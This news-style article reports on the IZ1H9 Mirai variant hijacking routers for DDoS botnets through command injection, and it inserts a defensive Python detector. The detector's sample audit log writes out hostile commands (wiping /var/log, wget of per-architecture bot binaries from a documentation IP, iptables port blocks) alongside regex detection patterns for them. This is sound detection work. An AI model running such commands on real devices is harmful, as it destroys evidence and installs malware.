This cyberattack campaign is targeting thousands of routers and turning them into bots for DDoS attacks.
There were thirteen payloads in this variant of Mirai, which was dubbed IZ1H9. Mirai is an old type of malware that’s used to target networked Linux devices and turn them into remotely controlled bots, with this variant turning routers and other IoT devices into zombified bots for large-scale network attacks.
The attackers then incorporate the zombie routers into botnets, enabling them to launch further attacks such as DDoS and brute-force campaigns.
According to Cybernews, thousands of routers were affected by unauthenticated command injections. Fortinet has counted thousands, and at the peak of the assault even tens of thousands, of signatures. Furthermore, the impact of this campaign is amplified by how rapidly the set of vulnerabilities it exploits is updated, with researchers stating: “This highlights the campaign’s capacity to infect vulnerable devices and dramatically expand its botnet through the swift utilization of recently released exploit code, which encompasses numerous CVEs (Common Vulnerabilities and Exposures).”
It is reported that D-Link devices are most targeted, with four new critical-severity vulnerabilities that allow remote attackers to deliver command injection via a crafted request.
Cybernews researchers explain that after the payload is injected and executed, it starts by deleting logs to conceal its actions, and then downloads and executes various bot clients to cater to diverse Linux architectures. In the final step, the shell script downloader obstructs network connections on multiple ports.
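As an added defender-side illustration (not code from the report, Cybernews or Fortinet), the following Python heuristic checks an executed-command audit trail from a Linux IoT device for the three downloader stages described above: log wiping, fetching bot clients for several CPU architectures, and blocking ports. The hosts, ports and commands in the sample are constructed for the example.

```python
import re
from typing import Dict, List

# Heuristic patterns for the three stages the report describes.
LOG_WIPE = re.compile(r"\brm\s+-\w+\s+\S*/var/log|>\s*/var/log/|\bhistory\s+-c\b")
FETCH = re.compile(r"\b(?:wget|curl|tftp)\b[^;|&]*")          # one download command
ARCH = re.compile(r"\b(arm\w*|mips\w*|x86\w*|i[3-6]86|sh4|ppc\w*|m68k)\b")
PORT_BLOCK = re.compile(
    r"\biptables\s+-[AI]\s+INPUT\b.*--dport\s+(\d+).*-j\s+(?:DROP|REJECT)"
)

def analyse_commands(commands: List[str]) -> Dict[str, object]:
    """Summarise which of the three stages appear in an ordered command list."""
    arches, ports, wiped = set(), [], False
    for cmd in commands:
        if LOG_WIPE.search(cmd):
            wiped = True
        # Architecture names inside download commands indicate per-arch bot clients.
        for fetch in FETCH.finditer(cmd):
            arches.update(m.group(1).lower() for m in ARCH.finditer(fetch.group(0)))
        m = PORT_BLOCK.search(cmd)
        if m:
            ports.append(int(m.group(1)))
    return {"log_wipe": wiped, "arches": sorted(arches), "blocked_ports": ports}

def is_iot_downloader_chain(commands: List[str]) -> bool:
    """Flag when bot clients for two or more architectures are fetched and at
    least one other described stage (log wiping or port blocking) is present."""
    r = analyse_commands(commands)
    multi_arch = len(r["arches"]) >= 2
    other_stages = int(r["log_wipe"]) + int(bool(r["blocked_ports"]))
    return multi_arch and other_stages >= 1

# Constructed audit excerpt (one command per entry, execution order); the
# 203.0.113.0/24 addresses are documentation-only addresses.
SAMPLE_COMMANDS = [
    "rm -rf /var/log/* ; history -c",
    "wget http://203.0.113.10/bins/mips -O /tmp/m",
    "wget http://203.0.113.10/bins/arm7 -O /tmp/a",
    "iptables -A INPUT -p tcp --dport 23 -j DROP",
    "iptables -A INPUT -p tcp --dport 7547 -j DROP",
]
# A single firmware download plus a firewall rule should not trigger the chain.
BENIGN_COMMANDS = [
    "wget http://203.0.113.99/firmware.bin -O /tmp/fw.bin",
    "iptables -A INPUT -p tcp --dport 23 -j DROP",
]

if __name__ == "__main__":
    print(analyse_commands(SAMPLE_COMMANDS), is_iot_downloader_chain(SAMPLE_COMMANDS))
```

The patterns are deliberately narrow; in practice they would be one signal among several (outbound connections to unknown hosts, new executables in writable paths) rather than a sole verdict.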
Fortinet warns “IoT devices have long been an attractive target for threat actors, with remote code execution attacks posing the most common and concerning threats to both IoT devices and Linux servers. The exposure of vulnerable devices can result in severe security risks. Despite the availability of patches for these vulnerabilities, the number of exploit triggers remains alarmingly high, often numbering in the thousands.”
To deal with this threat, researchers recommend applying patches and changing default login credentials.